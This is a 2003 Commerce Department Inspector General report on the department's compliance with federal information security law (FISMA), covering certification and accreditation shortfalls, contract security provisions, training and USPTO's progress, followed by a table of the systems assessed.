b"\x0cU.S. Department of Commerce                                                                        Final Inspection Report OSE-16146 \n\nOffice of Inspector General                                                                                            September 2003\n\n\n\n                                                                   CONTENTS\n\nEXECUTIVE SUMMARY ............................................................................................................. i\n\n\nINTRODUCTION .......................................................................................................................... 1 \n\n\nOBJECTIVES, SCOPE, AND METHODOLOGY........................................................................ 1 \n\n\nFINDINGS...................................................................................................................................... 4 \n\n\nI. \t    Information Security in IT Service Contracts Is Improving, but Additional Efforts Are \n\n        Needed ................................................................................................................................... 4 \n\nII. \t The Department Is Continuing to Refine Its Systems Inventory ........................................... 6 \n\nIII. \t The Department Should Continue to Report Information Security as a Material \n\n       Weakness ............................................................................................................................... 7 \n\nIV. \t The Department Has Established a Sound Plan of Action and Milestone (POA&M) \n\n      Process ................................................................................................................................... 9 \n\nV. \t Responsibilities and Authorities Are Clearly Specified for the Department CIO and \n\n     Operating Unit Officials ...................................................................................................... 12 \n\nVI.      
Significant IT Investments Require CIO Concurrence....................................................... 15 \n\nVII. \t Steps for Managing Life Cycle Information Security Are Prescribed in the                                      \n\n      Department\xe2\x80\x99s Policy............................................................................................................. 16 \n\nVIII. Information Security and Critical \tInfrastructure Protection Responsibilities Are Well            \n\n      Integrated, and Coordination With Other Security Functions Is Increasing........................ 19 \n\nIX. \t National- and Mission-Critical Asset Identification Efforts Continue to Be Refined........ 21 \n\nX. \t The Department\xe2\x80\x99s Information Security Policy Has Requirements for Documenting \n\n     Incident Reporting Procedures............................................................................................. 22 \n\nXI. \t The Department\xe2\x80\x99s Risk Assessments, Security Plans, and Testing of Security Controls \n\n      Continue to Need Serious Attention .................................................................................... 25 \n\nXII. \tUSPTO Is Making Significant Improvements to Risk Assessments, Security Plans,                                             \n\n      and Testing of Security Controls ......................................................................................... 27 \n\nXIII. The Department CIO Continues to Make Progress in Improving Information Security \n\n      Throughout Commerce ........................................................................................................ 28 \n\nXIV. Information Security Awareness Training Is Being Addressed, but Specialized                                  \n\n     Training Requirements Are Needed .................................................................................... 30 \n\nXV. 
\tIntegration of Security into the Capital Planning and Investment Control Process Is \n\n     Improving............................................................................................................................. 32 \n\nXVI. Conclusion .......................................................................................................................... 33 \n\nAppendix A. Evaluation of Certification and Accreditation Materials ..................................... A-1 \n\nAppendix B. OIG Evaluations Used In This Report.................................................................. B-1 \n\n\x0cU.S. Department of Commerce                                                     Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                        September 2003\n\n\n\n\n\n                                         EXECUTIVE SUMMARY \n\n\nThe Federal Information Security Management Act (FISMA), signed into law on December 17,\n2002, provides a comprehensive framework for ensuring that information resources supporting\nfederal operations and assets employ effective security controls. FISMA requires agencies to\nconduct annual information security program reviews and Offices of Inspector General (OIGs) to\nperform annual independent evaluations of those programs. Our independent evaluation for\nFY 2003 sought to determine whether the Department of Commerce\xe2\x80\x99s information security\nprogram and practices for unclassified systems comply with FISMA.\n\nAs a performance-based organization, the United States Patent and Trademark Office (USPTO)\nhas submitted its budget materials, information security review, and Performance and\nAccountability Report separate from those of the Department. For the past 2 fiscal years, we\nprepared a separate independent evaluation report on USPTO. 
For fiscal year 2003, however, we\nhave included USPTO in this single, Commerce-wide evaluation report, as has the Department in\nits OMB submission. This consolidation is in keeping with OMB\xe2\x80\x99s FY 2002 Report to Congress\non federal government information security reform, in which it combined USPTO with the rest\nof Commerce.\n\nThe structure and content of this report are designed to be responsive to the guidance provided\nby OMB in Reporting Instructions for the Federal Information Security Management Act, while\nalso providing useful information for Commerce officials. As directed in this guidance\ninstructions, we begin with our response to question A.2.a.\n\n    Total number of programs, systems, and\n                                                 Our evaluation is based on the results of OIG\n    contractor operations or facilities          reviews and audits of 43 systems in 9 of\n    evaluated in FY 2003. (OMB Question A.2.a)   Commerce\xe2\x80\x99s 14 operating units. These\n                                                 assessments looked at (1) selected systems at the\n                                                 National Oceanic and Atmospheric\nAdministration (NOAA); (2) general controls of financial systems (reviewed as part of the\nFY 2002 consolidated financial statement audit and financial statement audits of the National\nTechnical Information Service (NTIS) and USPTO); (3) status of the issues identified at the\nNational Institute of Standards and Technology (NIST) and USPTO in our in-depth evaluation of\nthese organizations last year; and (4) risk assessments, security plans, contingency plans, security\ntest and evaluation materials (test procedures and results), certification and accreditation1\ndocuments, capital asset plans (Exhibit 300s), and plans of action and milestones (POA&Ms)2\nfor a range of operating unit systems. 
We obtained additional information through interviews\nwith the chief information officers (CIOs) and senior information security officials of the\nDepartment, Census Bureau, International Trade Administration (ITA), NIST, NOAA, and\nUSPTO.\n\n1\n  Certification is the formal testing and evaluation of the security safeguards on a computer system to determine\nwhether they meet applicable requirements and specifications. Accreditation is the formal authorization by\nmanagement for system operation, including an explicit acceptance of risk.\n2\n  OMB guidance directs agencies to develop plans of action and milestones (POA&Ms) to correct program- and\nsystem-level IT security weaknesses and track each deficiency until it is corrected.\n\n                                                          i\n\x0cU.S. Department of Commerce                                                   Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                      September 2003\n\n\n\n\nWe also reviewed a random sample of 24 contracts awarded by Census, NIST, NOAA, Office of\nthe Secretary, and USPTO for the period October 2002 through August 20, 2003, to assess the\nDepartment\xe2\x80\x99s progress in incorporating information security requirements into information\ntechnology (IT) service contracts. Our principal\nfindings are summarized below.                         Information security in IT service\n                                                                   contracts. (OMB Question A.2 b-e)\nInformation Security in IT Service Contracts Is\nImproving, but Additional Efforts Are Needed. Commerce\xe2\x80\x99s IT expenditures accounted for\nnearly half ($500 million) of all contract obligations in FY 2002; some two-thirds of that amount\n(approximately $334 million) was for IT services. 
Our FY 2002 independent evaluation\nincluded a review of information security provisions in departmental contracts3 for these services\nand found that most contracts had either insufficient security provisions or none at all. We\nconcluded that federal and departmental policy and guidance for incorporating such provisions\nwere lacking. In the intervening year, the Department issued its information security policy and\ndrafted a standard contract provision\xef\xa3\xa7currently under departmental review\xef\xa3\xa7for safeguarding\nthe security of unclassified systems and information. The draft provision requires, among other\nthings, a system security plan and certification and accreditation for contracted IT resources/\nservices that involve connection to Commerce networks or storage of Commerce data on\ncontractor-owned systems.\n\nOur FY 2003 independent evaluation found that some progress has been made in incorporating\nsecurity provisions into recent IT service contracts. However, there remains (1) a general\nabsence of provisions for controlling access to Department systems and networks; and (2) little\nevidence of contract oversight, or of coordination among contracting, technical, and information\nsecurity personnel in developing appropriate contract security requirements. We believe the\ngeneral absence of such provisions and the inadequate interface among all staff involved in the\ncontracting/information security process continue to place Commerce systems and data at risk.\n(See page 4.)\n\n                                  The Department Is Continuing to Refine its Systems\nAgency\xe2\x80\x99s work to develop an\ninventory of major IT systems.\n                                  Inventory. Commerce\xe2\x80\x99s new information security policy,\n(OMB Question A.2.f)              issued in January 2003, requires all operating units to maintain\n                                  a comprehensive systems inventory. 
Each unit, including\nUSPTO, provides an updated copy of its inventory to the Department\xe2\x80\x99s IT security program\nmanager twice a year. As part of its compliance reviews of information security, the\nDepartment\xe2\x80\x99s CIO Office is validating the inventory data, with emphasis on determining whether\noperating units are properly applying NIST criteria in defining system boundaries. (See page 6.)\n\nThe Department Should Continue to Report Information                   Material weaknesses.\n                                                                       (OMB Question A.3)\nSecurity as a Material Weakness. For the past 2 fiscal years, the\nDepartment has reported information security as a material\nweakness in its Accountability Report. In our FY 2002 independent evaluation, we stated that\nthe Department should continue to report information security as a material weakness until all\n\n3\n The term \xe2\x80\x9ccontract\xe2\x80\x9d includes task orders and delivery orders issued under multiple award contracts and\ngovernment-wide agency contracts (GWACs).\n\n                                                        ii\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\nsystems that are national critical (part of the critical infrastructure) and mission critical have been\ncertified and accredited. The Department set a goal for certifying and accrediting these systems\nby the end of FY 2003. In our evaluation this year, we found numerous systems that have been\nreported as certified and accredited with significant deficiencies in their certification and\naccreditation materials\xef\xa3\xa7risk assessments, security plans, and contingency plans\xef\xa3\xa7and in most\ncases, lack evidence that security controls had been tested. 
These problems call into question the\neffectiveness of the certification and accreditation processes being used.\n\nWe understand that some of the certifications and accreditations that we reviewed are being\nreworked to meet the requirements of the Department\xe2\x80\x99s new information security policy.4\nHowever, given the shortcomings in the systems we evaluated, we do not believe that\ncertification and accreditation of the Department\xe2\x80\x99s roughly 340 national-critical and mission-\ncritical systems5\xe2\x80\x94of sufficient quality and content\xe2\x80\x94can be completed by the end of the fiscal\nyear. Thus, while the Department is to be commended for its push to certify and accredit its\ncritical systems, we believe that information security should be reported as a material weakness\nfor FY 2003. We have worked closely with the Department CIO on information security\nconcerns throughout the year, and he has indicated agreement with our conclusion. (See page 7.)\n\nUSPTO. Last year we found that USPTO lacked current certifications and accreditations for its\nsystems and suggested that it report information security as a material weakness until its mission-\ncritical systems are certified and accredited. (USPTO has no systems designated as national\ncritical). USPTO reported information security as a material weakness in its FY 2002\nAccountability Report, and set a goal of certifying and accrediting all high-risk systems by the\nend of FY 2003. The agency subsequently revised its systems inventory by consolidating more\nthan 100 systems into 19 systems, 9 mission critical and the remainder business essential. It\nplanned to have its 9 mission-critical systems and 1 classified system certified and accredited by\nthe end of FY 2003. As of mid-September, all 10 systems had undergone certification testing,\n5 had been granted interim accreditations, and 1 had received final accreditation. 
USPTO\nexpects to grant the remaining 4 systems 120-day interim accreditations by the end of the fiscal\nyear.\n\nUSPTO is employing a disciplined certification and accreditation process that includes rigorous\ntesting of security controls. Interim accreditations are not granted without comprehensive risk\nassessments, security plans, and testing. But because of the security weaknesses being identified\nby the certification process and the lack of final accreditations, we believe that USPTO should\nreport information security as a material weakness for FY 2003. (See page 8.)\n\n                              The Department Has Established a Sound Plan of Action and\n    Agencywide plan of action\n    and milestone process.    Milestone (POA&M) Process. The requirements for POA&Ms\n    (OMB Question A.4)        are specified in the Department\xe2\x80\x99s information security policy and\n                              are responsive to the criteria in OMB\xe2\x80\x99s FY 2003 FISMA\nguidance. Commerce develops, implements, and manages POA&Ms for all of its systems that\nhave identified security weaknesses. System owners6 are required to prepare the POA&Ms for\n\n4\n  We obtained certification and accreditation materials from the operating units in June and July 2003. \n\n5\n  The number of systems is based on the Department\xe2\x80\x99s March 2003 system inventory. \n\n6\n  The Department\xe2\x80\x99s information security policy defines a system owner as a project manager with day-to-day\n\n\n                                                       iii\n\x0cU.S. Department of Commerce                                                  Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                     September 2003\n\n\n\ntheir systems, and the operating unit IT security officer prepares the POA&M for the unit\xe2\x80\x99s\nprogram. 
Operating units are required to submit their POA&Ms, including the status of\ncorrective actions, to the Department CIO Office monthly. Commerce monitors POA&Ms\nclosely and uses them to manage corrective actions for all identified weaknesses. OIG has\naccess to all POA&Ms, but because many are based primarily on self-assessments, which may\nnot identify all weaknesses, we place greater reliance for identifying weaknesses on independent\nreviews. Commerce\xe2\x80\x99s POA&M database does not include the accounting codes associated with\neach line of the IT budget request, and IT system and budget reviews do not formally take into\naccount the content of the POA&Ms, although attention is given to information security in these\nreviews. The CIO Office intends to tie POA&Ms to the system budget request in\nFY 2004. (See page 9.)\n\nUSPTO. Like the Department, USPTO develops, implements, and manages POA&Ms for all of\nits systems that have identified security weaknesses. Its CIO Office develops the POA&Ms,\ncollaborating with program officials to ensure that information security weaknesses are\naddressed. To satisfy OMB\xe2\x80\x99s guidance, program officials at USPTO need to have primary\nresponsibility for the POA&Ms that support their operations. Beginning in FY 2004, USPTO\nwill submit its POA&Ms to the Department\xe2\x80\x99s CIO Office for incorporation into Commerce\xe2\x80\x99s\nconsolidated report to OMB. (See page 9.)\n\nResponsibilities and Authorities Are Clearly                Steps taken by the agency head to\n                                                            clearly and unambiguously set forth\nSpecified for the Department CIO and Operating              FISMA\xe2\x80\x99s responsibilities and authorities\nUnit Officials. 
The responsibilities and authorities        for the agency CIO and program officials,\n                                                            and actions to implement and enforce\nfor the Department\xe2\x80\x99s CIO and program officials              these steps. (OMB Question B.1)\nhave been clearly specified in the new information\nsecurity policy. Accordingly, the CIO has primary\noversight of all aspects of Commerce\xe2\x80\x99s information security program and reports to the Deputy\nSecretary on the status of information security within the Department. Operating unit heads have\nexplicit responsibility for the unit\xe2\x80\x99s information security, and program officials\xef\xa3\xa7members of an\noperating unit\xe2\x80\x99s top-level management team\xef\xa3\xa7must ensure the implementation of an effective\ninformation security program for the systems under their responsibility.\n\nIn July 2001, the Secretary directed secretarial officers and heads of operating units to give\ninformation security high priority and sufficient resources. Over the past 2 years, the Deputy\nSecretary has reinforced this direction and given the Department CIO strong support for\nimproving information security. Indeed, we believe that the progress made by Commerce in\ninformation security is attributable not only to the formal authority granted to the CIO position\nand the vigorous efforts of that official, but also to the Deputy Secretary\xe2\x80\x99s support, which has\nsignificantly enhanced the CIO\xe2\x80\x99s effectiveness. Simply stated, operating unit heads understand\nthat information security is a priority for the Deputy Secretary and that they need to be\nresponsive to issues raised by the Department CIO.\n\nIn addition, corrective actions at NIST demonstrate that operating unit heads are better\nrecognizing their new responsibilities. 
Last year we performed an in-depth review of NIST\xe2\x80\x99s\n\nmanagement and operational control over the system and direct oversight of the system/network administrators and\noperations staff.\n\n                                                       iv\n\x0cU.S. Department of Commerce                                             Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                                September 2003\n\n\n\ninformation security program, which identified numerous weaknesses. In response to our\nfindings, the NIST director took significant improvement actions. This year, we found that NIST\nhas made excellent progress in responding to our concerns and improving its information\nsecurity program. (See page 12.)\n\nUSPTO. The information security responsibilities and authorities for the agency\xe2\x80\x99s CIO and\nprogram officials are delineated in USPTO\xe2\x80\x99s draft Agency Administrative Order (AAO) 212-4,\nInformation Technology Security, which is expected to be finalized by the end of the fiscal year.\nOur independent evaluation last year reported that USPTO had long-standing information\nsecurity weaknesses requiring senior management attention. At the time, the agency\xe2\x80\x99s CIO had\nbeen in place for only a short period. This official and the Director of USPTO began a concerted\neffort to improve the agency\xe2\x80\x99s information security program, including devoting more resources\nto it and working to improve policy, controls, and oversight. The results of their commitment are\nevident in a considerably improved information security program. (See page 14.)\n\n                                 Significant IT Investments Require CIO Concurrence. No\n Authority for IT investment\n decisions. 
(OMB Question B.2)\n                                 operating unit can make a major IT investment without the\n                                 Department CIO\xe2\x80\x99s review and concurrence. The Commerce\n                                 Information Technology Review Board, cochaired by the CIO\nand chief financial officer (CFO), was established to support IT investment decision making.\nCertain IT initiatives not necessarily reviewed by the board are also subject to the Department\nCIO\xe2\x80\x99s approval. All other significant IT investment proposals must be approved by the\noperating unit CIO. (See page 15.)\n\nUSPTO. A management council consisting of USPTO senior executives, including the CIO,\nreviews and approves the agency\xe2\x80\x99s budget, including IT investments. The council also must\napprove all new initiatives, including IT investments, having a life-cycle cost greater than\n$100,000. Only those IT investments with which the agency CIO concurs are brought before the\ncouncil. (See page 15.)\n\nSteps for Managing Life Cycle\nInformation Security Are Prescribed in           Agency head\xe2\x80\x99s efforts to ensure that the information\n                                                 security plan is practiced throughout the life cycle of\nthe Department\xe2\x80\x99s Policy. The                     each system. Specific and direct actions taken by\nDepartment\xe2\x80\x99s new policy delineates the           the agency head to verify that the unit\xe2\x80\x99s program\n                                                 officials and CIO are ensuring that security plans are\nrequirements for managing information            up-to-date and practiced throughout the life cycle of\nsecurity for each system life-cycle phase and    each system. (OMB Questions B.3 and B.4)\nassigns primary responsibility to the system\nowner. 
Commerce has management and oversight processes to help ensure that life-cycle\ninformation security requirements are adhered to for all but one phase\xe2\x80\x94disposal\xe2\x80\x94for which it\nlacks an oversight mechanism. (See page 16.)\n\nUSPTO. USPTO\xe2\x80\x99s draft policy states that information security is managed throughout a\nsystem\xe2\x80\x99s life cycle, a responsibility assigned primarily to system owners. However, the policy\ndoes not contain a clear and concise delineation of requirements by life-cycle phase, nor does the\nagency\xe2\x80\x99s system life-cycle management manual (LCM). Both of these documents would be\nimproved by the addition of such information so that program officials and system owners fully\n\n\n                                                    v\n\x0cU.S. Department of Commerce                                           Final Inspection Report OSE-16146\n\nOffice of Inspector General                                                              September 2003\n\n\n\nunderstand their roles. The draft policy describes information security oversight reviews to be\nconducted by USPTO\xe2\x80\x99s CIO Office, and a technical review board appointed by the CIO is\ncharged with evaluating systems and associated information security concerns at key system\nmilestones. The certification testing conducted this past year identified areas throughout the\nsystem life cycle in which policies, procedures, and processes need to be improved. USPTO\nintends to revise its technical standards and guidelines and streamline its LCM next fiscal year to\naddress these issues. 
(See page 16.)\n\n                                                     Information Security and Critical\n  Integration of information security program with\n                                                     Infrastructure Protection Responsibilities\n  critical infrastructure protection responsibilities and\n                                                     Are Well Integrated, and Coordination\n  other security programs (e.g., continuity of operations,\n  and physical and operational security), including efforts\n  to eliminate unnecessary overhead costs and ensure\n                                                     With Other Security Functions Is\n  that policies and procedures are consistent and    Increasing. Commerce\xe2\x80\x99s critical\n  complementary across the various programs and      infrastructure and information security\n  disciplines. (OMB Questions B.5 and B.6)\n                                                     programs are under the authority of the\nDepartment CIO and are highly integrated. The Department\xe2\x80\x99s policy delineates partnerships that\nmust be maintained with offices under the CFO that have other security responsibilities,\nincluding the Office of Security (OSY), the Office of Human Resources Management, and the\nOffice of Acquisition Management. (See page 19.)\n\nUSPTO. The agency\xe2\x80\x99s draft policy addresses coordination and cooperation between information\nsecurity and other security programs, including interface with USPTO\xe2\x80\x99s physical security and\nhuman resource offices. USPTO has no national-critical assets. (See page 20.)\n\nNational- and Mission-Critical Asset                 Agency\xe2\x80\x99s identification of its critical operations\nIdentification Efforts Continue to Be                and assets (both national critical and mission\nRefined. 
Commerce has identified its                 critical) and the interdependencies and\n                                                     interrelationships of those operations and\nnational-critical assets\xe2\x80\x94an inventory it             assets. (OMB Question B.7)\ncontinues to update and refine\xe2\x80\x94but has not\ndetermined the interdependencies among them. Both the Department and USPTO have\nidentified and continue to refine their mission-critical asset inventory, and to the extent that\nsecurity plans for these systems follow the required NIST guidance, they identify direct\ninterconnections with other systems for information sharing. As the Department and USPTO\ndefine and document their enterprise architectures\xef\xa3\xa7which show the relationship between\nbusiness functions and the technologies and information that support them\xef\xa3\xa7they should identify\ninterrelationships of mission-critical systems. (See page 21.)\n\n                                          The Department\xe2\x80\x99s Information Security Policy Has\n  How agency head ensures that the agency\n  and all its components have documented\n                                          Requirements for Documenting Incident Reporting\n                                          Procedures. The Department\xe2\x80\x99s policy defines the\n  procedures for reporting security incidents\n  and sharing information about common    types of incidents that need to be reported and requires\n  vulnerabilities. (OMB Question B.8)\n                                          each operating unit to submit its response procedures\n                                          to Commerce\xe2\x80\x99s CIO Office for review and approval.\nThe policy requires operating unit computer incident response teams (CIRTs) and the\nDepartment\xe2\x80\x99s CIRT to report incidents to the Federal Computer Incident Response Center\n(FedCIRC), but does not set a timeframe for doing so. 
A memorandum of agreement between OIG, CIO, and OSY—which will be revised and renewed in FY 2004—delineates roles, responsibilities, and procedures for reporting incidents to OIG and external law enforcement. The details of this agreement need to be incorporated into or referenced by the Department’s information security policy. (See page 22.)

USPTO. USPTO has draft incident response procedures, which it intends to finalize by the end of the fiscal year. While detailed and specific, the procedures do not provide a timeframe for reporting incidents to FedCIRC or require notifying OIG when an incident occurs. The director of the IT Security Program Office told us that modifications will be made to address these areas before the procedures are finalized. (See page 23.)

Risk assessments, security level determinations, security plans, and security control testing and evaluation. (OMB Question C.1)

The Department’s Risk Assessments, Security Plans, and Testing of Security Controls Continue to Need Serious Attention. Our evaluation this year found many risk assessments and security plans that did not provide essential information for determining appropriate system security controls, and still others whose information was inaccurate or inconsistent. We also found that certifications were frequently granted without careful review of the documentation and with little or no testing, and thus did not identify residual risks.7 Without reliable documentation and certifications, accrediting officials lack sufficient information for making informed decisions about whether a system’s residual risks are acceptable and accreditation is therefore desirable. The deficiencies we identified affected systems controlled by program officials as well as by operating unit CIOs. According to the Department CIO, improvements are being made to the certification and accreditation process that should correct some of the problems we identified with the current accreditations. (See page 25.)

7 Residual risks are the risks remaining after appropriate security controls have been applied to the information system.

USPTO Is Making Significant Improvements to Risk Assessments, Security Plans, and Testing of Security Controls. The agency’s one certified and accredited system had a thorough risk assessment and comprehensive security and contingency plans. Certification included extensive testing of security controls that identified weaknesses in the system itself, as well as organization-wide security issues. USPTO appears to be using the same rigorous process for certifying and accrediting its remaining systems. It is clear that as the agency corrects the problems identified by means of its certification and accreditation program, its systems will be appreciably more secure. (See page 27.)

The agency CIO’s ability to adequately maintain an agencywide information security program, ensure effective implementation of the program, and evaluate the performance of major agency components. (OMB Question C.2)

The Department CIO Continues to Make Progress in Improving Information Security Throughout Commerce. The Department CIO has focused intensely on improving information security and has made significant strides. In finalizing the new information security policy this past January, he gave Commerce a comprehensive blueprint for securing agency information systems. The Department CIO is making a determined effort to effectively implement the security program, though much remains to be done—especially in assessing risk, determining appropriate security controls, testing and evaluating these controls, and certifying and accrediting systems. But satisfying the demands of information security law, policy, and guidance requires substantial change in the culture of an organization that, until recently, has given scant attention to this area. Thus, it remains a considerable challenge to ensure that program and IT officials throughout the Department and personnel with specialized information security roles understand their responsibilities and have the knowledge and skills to carry them out effectively. The Department CIO Office is evaluating the performance of all Commerce operating units through a compliance review program designed to validate the security information they report and assess the effectiveness of their information security programs. (See page 28.)

USPTO. Last fiscal year, USPTO’s newly appointed CIO began giving serious attention to improving information security and has made considerable progress.
USPTO’s information security policies, when refined and finalized, should address the requisite security program requirements. As we have discussed previously, USPTO is well on its way to certifying and accrediting all of its mission-critical systems and is using sound processes to do so. As with the rest of the Department, effectively implementing the required information security program at USPTO requires significant cultural change. USPTO’s CIO is currently working with program officials to facilitate their understanding and acceptance of their more active role and increased accountability before the policy is finalized. We believe the CIO’s effort is essential to initiating and maintaining an effective information security program.

The involvement in and oversight of USPTO’s CIO Office in the ongoing certification and accreditation efforts, the POA&M process, and the work of an employee designated as an internal IT auditor are the principal means by which USPTO is evaluating its major components. The Department intends to assess USPTO as part of its compliance review program. (See page 28.)

The agency CIO’s efforts to ensure that all agency employees, including contractors and those employees with significant information security responsibilities, are aware of and trained in information security policies and practices. (OMB Question C.3)

Information Security Awareness Training Is Being Addressed, but Specialized Training Requirements Are Needed. The Department’s policy includes requirements for security awareness training for new employees and contractors, and annual refresher training for all existing employees and contractors who have access to systems containing sensitive information. During this fiscal year, the Department CIO acquired an enterprise license for web-based information security training, which will make awareness refresher training available free of charge to Commerce employees and contractors. However, we found that slow progress has been made in providing specialized training for personnel with significant information security responsibilities. The Department has been attempting to establish more uniform requirements or guidance for specialized training, and in the meantime is making specialized training available throughout Commerce via the same enterprise license. Our independent evaluation this year found that some IT security officers and system administrators still lack a sufficient understanding of their duties and responsibilities. We also found a pervasive lack of understanding of the objectives and requirements of system risk assessment, security planning, contingency planning, and certification and accreditation. These findings highlight the importance of ensuring that specialized security training is provided to those who need it. (See page 30.)

USPTO. USPTO is using the Department’s enterprise license to provide the mandated annual awareness refresher training, and plans to implement specialized training for approximately 150 employees and contractors, also via the Department’s license. USPTO executives have received specialized training in information security, including certification and accreditation, and CIO managers and staff have been trained in USPTO’s IT processes, including information security. USPTO is using NIST guidance to develop requirements for specialized training. (See page 31.)

Agency CIO’s efforts to fully integrate security into the capital planning and investment control process. (OMB Question C.4)

Integration of Security into the Capital Planning and Investment Control Process Is Improving. We reviewed FY 2004 capital asset plans for BIS, NESDIS, NOS, NWS, and NTIA (FY 2005 plans were not available when we conducted our fieldwork). In general, these plans provide more specific information than last year’s plans on security requirements and how they are addressed. Some, however, still contained generic discussions of security requirements and controls, and it was unclear in one plan whether the system had been certified and accredited. All of the plans stated that the system’s security controls had been tested. Our assessment found little if any testing of security controls for most systems beyond self-assessments. (See page 32.)

USPTO. The agency prepared capital asset plans for the FY 2004 budget submission that comprehensively addressed the areas required by OMB and demonstrate that USPTO has made a serious effort to include information security in its capital asset planning. (See page 32.)

Conclusion. Our FY 2003 FISMA review found that senior management continues to give attention to information security. With the support of the Deputy Secretary, the Department’s CIO has worked hard to improve information security throughout Commerce and has made noteworthy progress.
The Department’s new policy comprehensively defines Commerce’s program for assuring agency information systems are adequately protected, and its detailed requirements are helping improve the security programs of the operating units.

This noteworthy progress is moderated by considerable challenges. The most difficult of these has been ensuring adequate security on the hundreds of Commerce systems—a challenge that cannot be fully met until program and IT officials throughout the Department better understand what is expected of them, and all personnel with specialized information security roles acquire and maintain the requisite knowledge and skills. (See page 33.)

USPTO. USPTO’s information security program continues to progress. This agency is working to ensure that its senior program officials understand and accept their responsibilities for information security, a prerequisite for an effective and long-lived program. USPTO is well on its way to having systems certified and accredited. And because it is using a rigorous approach and comprehensive testing, it has gained a great deal of insight into system-specific weaknesses that must be corrected and organization-wide security policies, procedures, and processes that must be improved. USPTO must continue to focus on correcting the identified system weaknesses; improve policies, procedures, and processes; and ensure compliance on a continuing basis. (See page 33.)

INTRODUCTION

The Federal Information Security Management Act (FISMA), set out in Title III of the E-Government Act of 2002 (P.L. 107-347), was signed into law on December 17, 2002. FISMA permanently reauthorized and expanded upon the framework laid out in the Government Information Security Reform Act of 2000 (GISRA),8 for ensuring that information resources supporting federal operations and assets are protected by effective security controls. FISMA requires agencies to conduct annual information security program reviews and Offices of Inspector General (OIGs) to perform annual independent program evaluations.

As a performance-based organization, the United States Patent and Trademark Office (USPTO) has submitted its budget materials, information security review, and Performance and Accountability Report separate from those of the Department. For the past 2 fiscal years, we prepared a separate independent evaluation report on information security at USPTO. For fiscal year 2003, however, we are including USPTO in this single, Commerce-wide evaluation report, as is the Department in its OMB submission. This consolidation is in keeping with OMB’s FY 2002 Report to Congress on federal government information security reform, in which it combined USPTO with the rest of Commerce. The details and results of our independent evaluation for FY 2003 follow below.

OBJECTIVES, SCOPE, AND METHODOLOGY

We sought to determine whether the Department of Commerce’s (DOC’s) information security program and practices for unclassified systems comply with the requirements of FISMA.
Our evaluation is based on the results of the following OIG work:

1. Assessments of selected systems at the National Oceanic and Atmospheric Administration’s (NOAA’s) National Marine Fisheries Service (NMFS) and National Environmental Satellite Data and Information Service (NESDIS);

2. Audit of general controls of financial systems (reviewed as part of the Department’s FY 2002 consolidated financial statement audit and the financial statement audits of the National Technical Information Service (NTIS) and USPTO);

3. Review of the status of issues identified at the National Institute of Standards and Technology (NIST) and USPTO in our in-depth evaluation of these organizations last year;

4. Review of risk assessments, security plans, contingency plans, security test and evaluation materials (test procedures and results), certification and accreditation9 documents, capital asset plans (Exhibit 300s), and plans of action and milestones (POA&Ms)10 for a range of systems in the Bureau of Economic Analysis (BEA), Bureau of Industry and Security (BIS), Census Bureau, International Trade Administration (ITA), NIST, NTIS, and National Telecommunications and Information Administration (NTIA), NOAA, and USPTO;

5. Interviews with the CIOs and senior information security officials of the Department, Census, ITA, NIST, NOAA, and USPTO to obtain additional information regarding the agencywide POA&M process and responsibilities of the agency head, operating unit heads, and agency and operating unit program officials and chief information officers (CIOs), and

6. Review of a random sample of 24 contracts at Census, NIST, NOAA, Office of the Secretary, and USPTO to assess the Department’s progress in incorporating information security requirements into information technology (IT) service contracts.

8 GISRA expired in November 2002.

9 Certification is the formal testing and evaluation of the security safeguards on a computer system to determine whether they meet applicable requirements and specifications. Accreditation is the formal authorization by management for system operation, including an explicit acceptance of risk.

We conducted our evaluation using FISMA; OMB Circular A-130, Appendix III, “Security of Federal Automated Information Resources”; DOC IT Security Program Policy and Minimum Implementation Standards; the National Information Assurance Certification and Accreditation Process (NIACAP)11; and the following NIST special publications: Security Self-Assessment Guide for Information Technology Systems (800-26), Risk Management Guide for Information Technology Systems (800-30), Guide for Developing Security Plans for Information Technology Systems (800-18), and Contingency Planning Guide for Information Technology Systems (800-34). OIG contractors conducted the general control reviews of financial systems against criteria contained in GAO’s Federal Information System Controls Audit Manual (FISCAM).

The structure and content of this report are designed to be responsive to the guidance provided by OMB in Reporting Instructions for the Federal Information Security Management Act, while also providing useful information for Commerce officials. As directed in this guidance, we begin with question A.2.a. We are issuing our report in final because it makes no new recommendations.

We performed this evaluation in accordance with the Inspector General Act of 1978, as amended, and the Quality Standards for Inspections, March 1993, issued by the President’s Council on Integrity and Efficiency. We conducted our fieldwork between October 2002 and August 2003.

10 OMB guidance directs agencies to develop plans of action and milestones (POA&Ms) to remediate program- and system-level IT security weaknesses and track each deficiency until it is corrected.

11 National Security Agency, National Information Assurance Certification and Accreditation Process (NIACAP), National Security Telecommunications and Information Systems Security Instruction No. 1000. NIACAP establishes the minimum standards for certifying and accrediting national security systems. Its use is required by the Department’s information security policy for sensitive but unclassified systems.
Overview of FISMA IT Security Review

Total number of programs, systems, and contractor operations or facilities evaluated in FY 2003. (OMB Question A.2.a)

In FY 2003 we assessed a total of 43 systems in 9 of the Department’s 14 operating units (see table 1), and 24 contracts in 5 of those operating units.

Table 1. Operating Unit Systems Assessed in FY 2003

Office of the Secretary
    Commerce Administrative Management System*

Bureau of Economic Analysis (BEA)
    National Income and Wealth Division
    Industry Economics Division
    Local Area Network

Bureau of Industry and Security (BIS)
    Export Control Automated Support System
    Bureau Communication Infrastructure
    Treaty Compliance/Information Management System #1

Census Bureau
    National Processing Center
    Geography
    Data Centers*

Economic Development Agency (EDA)
    Data Center*

National Institute of Standards and Technology (NIST)
    Manufacturing Engineering Laboratory Office System
    Time Scale and Network Time Services
    Network Infrastructure (Gaithersburg)
    Network Infrastructure (Boulder)
    Boulder E-mail Server System
    Data Center*

National Technical Information Service (NTIS)
    Automated Document Storage and Retrieval
    Computing Information Service Publishing
    PC and Network
    Data Center*

United States Patent and Trademark Office (USPTO)
    Network Perimeter System
    Financial Management Systems*

National Oceanic and Atmospheric Administration (NOAA)
  NOAA Headquarters
    Data Center*
  National Environmental Satellite Data and Information Service (NESDIS)
    Headquarters Local Area Network
    Research Data System
    Integrated Program Office Local Area Network
  National Marine Fisheries Service (NMFS)
    Headquarters Local Area Network
    Headquarters Wide Area Network
  National Ocean Service (NOS)
    Coastal Services Center IT Support System
